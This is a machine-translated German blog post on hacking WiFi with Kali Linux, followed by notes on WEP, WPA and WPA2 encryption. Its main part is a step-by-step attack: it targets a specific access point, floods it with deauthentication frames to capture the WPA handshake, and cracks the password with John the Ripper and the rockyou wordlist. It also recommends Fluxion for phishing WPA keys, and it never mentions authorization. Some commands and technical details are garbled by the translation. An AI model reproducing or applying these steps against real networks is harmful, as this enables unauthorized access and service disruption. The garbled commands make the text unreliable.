Wie Hack Wifi mit Kali Linux?

Die meisten Fragen bei Google sind, wie man Wifi mit Kali Linux hackt , Wifi hackt , wie man Wifi mit Kali Linux hackt usw. Aber zuerst verstehen, was ist Wifi & seine Verschlüsselung.

Inhalt posten

Was ist Wi-Fi und ist es möglich, es zu hacken?

Wi-Fi ist der Name einer beliebten drahtlosen Netzwerktechnologie, die Funkwellen verwendet, um drahtloses Highspeed-Internet und Netzwerkverbindungen bereitzustellen. Ein häufiges Missverständnis ist, dass der Begriff Wi-Fi die Abkürzung für „Wireless Fidelity“ ist, Dies ist jedoch nicht der Fall. Wi-Fi ist einfach eine geschützte Phrase, die IEEE 802.11x bedeutet.

Wenn wir über Wifi-Hacking von jedem Gerät aus sprechen, ist die Sicherheit dieses WiFi am wichtigsten. Wenn wir also versuchen, WiFi zu hacken, ist es sehr einfach, das Passwort des verfügbaren WPS-Systems zu knacken oder zu hacken. WPS ist eine der Verschlüsselungsarten, die zur Sicherung des WLAN-Netzwerks verwendet wird.

Tools zum Hacken des WLAN-Passworts in Kali-Linux

Hauptsächlich verwenden wir das in Kali Linux integrierte Toolset zum Hacken des WLAN-Passworts:

  • airmon-ng
  • aireplay-ng
  • airodump-ng
  • hccap
  • john the ripper
  • aircrack-ng

Airmon-ng

Dieses Skript kann verwendet werden so aktivieren Sie den Monitormodus für drahtlose Schnittstellen. Es kann auch verwendet werden, um vom Monitormodus in den verwalteten Modus zurückzukehren. Wenn Sie den Befehl airmon-ng ohne Parameter eingeben, wird der Status der Schnittstellen angezeigt.

Verwendung: airmon-ng <start / stop> <Schnittstelle> oder airmon-ng <check | check kill>

Aireplay-ng

Aireplay-ng wird zum Injizieren von Frames verwendet.

Die Hauptfunktion besteht darin, Datenverkehr für die spätere Verwendung in aircrack-ng zum Knacken der WEP- und WPA-PSK-Schlüssel zu generieren. Es gibt verschiedene Angriffe, die zu Deauthentifizierungen führen können, um WPA-Handshake-Daten, gefälschte Authentifizierungen, interaktive Paketwiedergabe, handgefertigte ARP-Anforderungsinjektion und ARP-Anforderungsinjektion zu erfassen. Mit dem Tool packetforge-ng ist es möglich, beliebige Frames zu erstellen.

Die meisten Treiber müssen gepatcht werden, um injizieren zu können.

Airodump-ng

Airodump-ng wird zur Paketerfassung von rohen 802.11-Frames verwendet und eignet sich besonders zum Sammeln von WEP-IVs (Initialisierungsvektoren), um sie mit aircrack-ng zu verwenden. Wenn Sie einen GPS-Empfänger an den Computer angeschlossen haben, kann airodump-ng die Koordinaten der gefundenen Zugangspunkte protokollieren.

Zusätzlich schreibt airodump-ng mehrere Dateien aus, die die Details aller gesehenen Access Points und Clients enthalten.

Hccap

Zum Konvertieren von Aircrack-ng-Capture-Hashes in .hccapx wir verwenden diesen Befehl.

John The Ripper

Um das Passwort zu knacken, verwenden wir den John the Ripper in der letzten Stufe. wir verwenden dieses Tool, um die Hashes mit dem Passwortwörterbuch zu vergleichen. Es gibt viele andere Möglichkeiten, aber wir werden eine davon ausprobieren.

Aircrack-ng

Aircrack-ng ist eine vollständige Suite von Tools zur Bewertung der WLAN-Netzwerksicherheit.

Es konzentriert sich auf verschiedene Bereiche der WiFi-Sicherheit:

  • Überwachung: Paketerfassung und Export von Daten in Textdateien zur Weiterverarbeitung durch Tools von Drittanbietern
  • Angreifen: Replay-Angriffe, Deauthentifizierung, gefälschte Zugangspunkte und andere über Paketinjektion
  • Testen: Überprüfung der WLAN-Karten und Treiberfunktionen (Erfassung und Injektion)
  • Knacken: WEP und WPA PSK (WPA 1 und 2)

Schritte zum Hacken von WLAN mit Kali-Linux oder einem anderen Debian Linux-Betriebssystem.

Alle Befehle mit Beschreibung sind oben angegeben Überprüfen Sie, ob Sie ein Problem haben.

Schritt 1 :

Schalten Sie Ihre Netzwerkkarte zunächst in den Monitormodus, um die umliegenden Netzwerke zu überwachen.

#airmon-ng wlan1 starten

1
2

# airodump-ng wlan1mon

3
4

Schritt 2:

#airodump-ng -bssid 2C:55:D3:B1:35:0C -c 1 -w kalip300 wlan1mon

5
6

Schritt 3:

#aireplay-ng -0 0 -a 2C:55:D3:B1:35:0C wlan1mon

7

Nachdem wir die Handshak-Datei erfolgreich erfasst haben, sehen wir so etwas.

8

Schritt 4:

#aircrack-ng kalip300-01.cap -j john

9

Schritt 5:

#hccap2john john.hccap > wpa

Schritt 6:

#john -wordlist*/root/Desktop/rockyou.txt / Wurzel / Desktop / wpa

Und wir hacken erfolgreich das WiFi-Passwort von kali linux

Wifi Hacking Tool :- Fluxion

Fluxion ist ein Sicherheitsaudit- und Social-Engineering-Forschungstool. Es ist ein Remake von linset von vk496 mit (hoffentlich) weniger Bugs und mehr Funktionalität. Das Skript versucht, den WPA / WPA2-Schlüssel von einem Zielzugangspunkt mittels eines Social-Engineering-Angriffs (Phishing) abzurufen. Es ist kompatibel mit der neuesten Version von Kali (Rolling). Das Setup der Fluxion-Angriffe erfolgt größtenteils manuell, aber der experimentelle Auto-Modus behandelt einige der Setup-Parameter der Angriffe. Lesen Sie die FAQ, bevor Sie Probleme anfordern.

Drahtlose Verschlüsselung

WEP-Verschlüsselung

Wired Equivalent Privacy (WEP) ist ein drahtloses IEEE 802.11-Protokoll, das Sicherheitsalgorithmen für die Vertraulichkeit von Daten bei drahtlosen Übertragungen bereitstellt.

WEP verwendet eine 24-bit Initialisierung vektor (IV) zu bilden stream chiffre RC4 Für vertraulichkeit, und die CRC-32 checksum für intergrity von drahtlose übertragung.

Funktionsweise von WEP

  1. Die CRC-32-Prüfsumme wird verwendet, um einen 32-Bit-Integritätsprüfwert (ICV) für die Daten zu berechnen, der wiederum dem Datenrahmen hinzugefügt wird.

2. Eine beliebige 24-Bit-Zahl, die als Initialisierungsvektor (IV) bezeichnet wird, wird dem WEP-Schlüssel hinzugefügt; WEP-Schlüssel und IV werden zusammen als WEP-Seed bezeichnet.

3. Der WEP-Seed wird als Eingabe für den RC4-Algorithmus verwendet, um einen Schlüsselstrom zu erzeugen (der Schlüsselstrom wird bitweise mit der Kombination von Daten und ICV XOred, um die verschlüsselten Daten zu erzeugen).

4. Das IV-Feld (IV + PAD+KID) wird dem Chiffretext hinzugefügt, um einen MAC-Frame zu generieren

Funktionsweise von WEP

WPA-Verschlüsselung

Wi-Fi Protected Access (WPA) ist eine Datenverschlüsselungsmethode für WLANs Basierend auf 802.11 normen.

Es handelt sich um eine Momentaufnahme von 802.11i (in Entwicklung), die eine stärkere Verschlüsselung bietet und PSK für die EAP-Authentifizierung aktiviert.

Wie WPA funktioniert

Zeitlicher Verschlüsselungsschlüssel, Sendeadresse und TKIP-Sequenzzähler (TSC) werden als Eingabe für den RC4-Algorithmus verwendet, um Schlüsselwörter zu generieren.

MAC Service Data Unit (MSDU) und Message Intergrity Check (MIC) werden unter Verwendung des Michael-Algorithmus kombiniert.

Die Kombination von MSDU und MIC ist fragmentiert, um eine MAC Protocol Data Unit (MPDU) zu erzeugen.

Für die MPDU wird ein 32-Bit-Integritätsprüfwert (ICV) berechnet

Die Kombination von MPDU und ICV wird bitweise mit Keysteam XORed, um die verschlüsselten Daten zu erzeugen

Die IV wird zu den verschlüsselten Daten addiert, um einen MAC-Frame zu erzeugen.

WPA 2 Verschlüsselung

WPA 2 bietet unternehmen und WI-FI benutzer mit stärker daten schutz und netzwerk access control

Bietet regierung grade sicherheit durch die umsetzung der National Institute of Standards und Technologie (NIST) FIPS 140-2 konform AES verschlüsselung algorithmus.

WPA2 – Personal

WPA2 – Personal verwendet ein Einrichtungskennwort (Pre-Shared Key), um unbefugten Netzwerkzugriff zu schützen.

Im PSK-Modus verschlüsselt jedes drahtlose Netzwerkgerät den Netzwerkverkehr mit einem 128-Bit-Schlüssel, der aus einer Passphrase von 8 bis 63 ASCII-Zeichen abgeleitet ist.

WPA2 – Enterprise

Es enthält EAP oder RADIUS für die zentrale Client-Authentifizierung mit mehreren Authentifizierungsmethoden wie Token-Karten, Kerberos, Zertifikaten usw.

Benutzern werden von einem zentralen Server Anmeldeinformationen zugewiesen, die sie bei der Verbindung zum Netzwerk vorlegen müssen.

Funktionsweise von WPA2

In der CCMP-Implementierung von WPA2 werden Mac-Header-Daten zum Erstellen zusätzlicher Authentifizierungsdaten (AAD) verwendet.

Eine sequenzierte Paketnummer (PN) wird zum Erstellen von Nonce verwendet.

AAD, temporal key und nonce werden zusammen mit CCMP für die Datenverschlüsselung verwendet.

Ein WPA2-MAC-Frame wird mit MAC-Header, CCMP-Header, verschlüsselten Daten und verschlüsseltem MIC erstellt

Wie WPA2 funktioniert

Sie haben möglicherweise verpasst, wie Sie das Telefon hacken

Write a Comment

Deine E-Mail-Adresse wird nicht veröffentlicht.